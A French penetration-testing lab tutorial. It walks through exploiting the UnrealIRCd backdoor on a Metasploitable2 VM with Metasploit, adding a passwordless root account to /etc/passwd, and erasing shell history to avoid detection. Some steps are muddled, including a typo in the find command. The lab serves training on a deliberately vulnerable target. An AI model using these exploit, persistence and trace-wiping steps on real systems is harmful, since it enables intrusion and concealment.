Introduction
Dans ce laboratoire, nous allons apprendre à créer une porte dérobée (backdoor) et à effacer les traces après avoir réussi à accéder à une machine cible via une attaque de pénétration. Le scénario est configuré dans l'environnement LabEx, où nous utiliserons le terminal Kali pour exploiter les vulnérabilités de la machine cible Metasploitable2, obtenir l'accès root, créer une porte dérobée pour un accès ultérieur et effacer toutes les traces laissées lors du processus d'attaque.
Obtenir l'accès root sur la machine cible
Dans cette étape, nous allons utiliser la vulnérabilité Unreal Ircd pour obtenir l'accès root sur la machine cible.
Maintenant, vous allez démarrer la machine d'attaque (conteneur Kali Linux) et la machine cible (machine virtuelle Metasploitable2) pour l'expérience.
- Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2
Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.
- Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
- Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
- À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
Maintenant, la machine d'attaque et la machine cible sont en cours d'exécution, et vous pouvez commencer le test de pénétration.
Remarque : Si vous quittez accidentellement le bash actuel, le conteneur Kali s'arrêtera automatiquement. Vous pouvez exécuter docker run -ti --network host b5b709a49cd5 bash à nouveau sur l'hôte pour démarrer un nouveau conteneur Kali et entrer dans le bash pour continuer l'expérience.
- Dans le conteneur Kali Linux, entrez les commandes suivantes dans le terminal bash de Kali Linux :
service postgresql start
msfdb init
cd ~
msfconsole
Cela démarrera le service de base de données PostgreSQL, initialisera la base de données et lancera la console du Framework Metasploit (msfconsole) pour des opérations ultérieures.
- Recherchez le module de vulnérabilité Unreal Ircd :
search unreal_ircd
- Utilisez le module
unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Définissez l'adresse IP de la cible :
set RHOST 192.168.122.102
- Exploitez la vulnérabilité pour obtenir l'accès :
exploit
- Vérifiez l'utilisateur actuel :
whoami
Vous devriez voir que vous avez obtenu l'accès root sur la machine cible.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Créer une backdoor
Maintenant que nous avons obtenu l'accès root, créons une porte dérobée (backdoor) pour accéder ultérieurement à la machine cible.
Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
Ensuite, vérifiez les informations système :
uname -a
Trouvez l'emplacement du bash de l'utilisateur root :
cat /etc/passwd
Créez un compte de porte dérobée sans mot de passe :
echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd
Vérifiez la création du compte de porte dérobée :
cat /etc/passwd
Vous devriez voir le nouveau compte shiyanlou1234 dans la sortie.
Ouvrez un nouveau terminal et connectez-vous à la machine cible en utilisant le compte de porte dérobée :
telnet 192.168.122.102
Entrez le nom d'utilisateur shiyanlou1234 lorsque cela vous est demandé.
Vérifiez l'utilisateur actuel :
whoami
Vous devriez voir que vous êtes connecté en tant qu'utilisateur de la porte dérobée.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Effacer les traces
Après avoir obtenu l'accès et créé une porte dérobée (backdoor), il est important d'effacer toutes les traces laissées lors du processus d'attaque pour éviter la détection.
Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
Une méthode courante pour effacer les traces consiste à supprimer l'historique des commandes. L'historique est stocké dans le fichier .bash_history. Vous pouvez effacer l'historique en utilisant la commande suivante :
history -c
Pour effacer le fichier .bash_history, vous pouvez trouver son emplacement en utilisant la commande find :
find / -name.bash_history
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Résumé
Dans ce laboratoire, nous avons appris à obtenir l'accès root sur une machine cible en utilisant la vulnérabilité Unreal Ircd, à créer un compte de porte dérobée (backdoor) pour un accès ultérieur et à effacer les traces laissées lors du processus d'attaque. Cette expérience pratique vous aidera à comprendre les techniques utilisées par les attaquants pour maintenir un accès persistant et dissimuler leurs traces après une attaque de pénétration réussie.